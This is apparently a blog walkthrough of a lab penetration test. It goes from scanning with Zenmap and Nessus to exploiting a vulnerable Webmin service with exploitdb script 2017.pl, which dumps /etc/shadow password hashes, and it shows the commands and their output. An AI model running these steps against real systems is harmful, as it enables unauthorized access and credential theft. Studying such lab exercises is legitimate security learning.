Gathering Infomation & service enemuration
target using ip 192.168.0.21
scanning using
zenmap & netifera
using zenmap
using netifera
second steep
Vulnerability Assesement
using nessus for scanning vulner of target 192.168.0.21
this is result of scanning form nessus. i got same service n port of service.
from this result i got one of service by name of service is www port 10000 and press that service for now about vulner of that service. we got webmin service
if all of information got id.
now to last step is exploit using exploitdb
last stepp
Exploit using exploitdb
open exploitdb ans serching about vulner of target. for searching type
./searchsploit webmin
will open about exloit
root@bt:/pentest/exploits/exploitdb#
./searchsploit webmin
Description
Path
---------------------------------------------------------------------------
-------------------------
Webmin BruteForce and Command Execution
Exploit /multiple/remote/705.pl
Webmin Web Brute Force v1.5
(cgi-version)
/multiple/remote/745.cgi
Webmin BruteForce + Command Execution
v1.5 /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220
Arbitrary File Disclosure Exploit /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220
Arbitrary File Disclosure Exploit (perl) /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote
File Include Vulnerability /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote
File Include Vulnerability /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote
File Include Vulnerabilities /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote
File Include Vulnerabilities /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote
File Include Vulnerabilities /php/webapps/2462.txt
root@bt:/pentest/exploits/exploitdb#
we god result from exploitdb now for explot using
Webmin < 1.290 / Usermin < 1.220
Arbitrary File Disclosure Exploit (perl) /multiple/remote/2017.pl
for explaind why using Arbitrary File Disclosure Exploit without using BruteForce and Command Execution
Exploit
Arbitrary : reading file without control
BruteForce : force entry.
now running Arbitrary file by type
./perl platform//multiple/remote/2017.pl
root@bt:/pentest/exploits/exploitdb#
perl platforms/multiple/remote/2017.pl
Usage:
platforms/multiple/remote/2017.pl <url> <port> <filename>
<target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000
/etc/passwd
if it's running well now running for exploit by using above information
root@bt:/pentest/exploits/exploitdb#
perl platforms/multiple/remote/2017.pl 192.168.0.21 10000 /etc/shadow
0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at
umz32.dll [at] gmail.com
Vulnerability disclose at
securitydot.net
I am just coding it in perl 'cuz I hate
PHP!
Attacking 192.168.0.21 on port 10000!
FILENAME: /etc/shadow
FILE CONTENT STARTED
-----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
-------------------------------------
from this information we have 4 identity about user and pass :
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
that all for privilege escalation
be fun
Tidak ada komentar:
Posting Komentar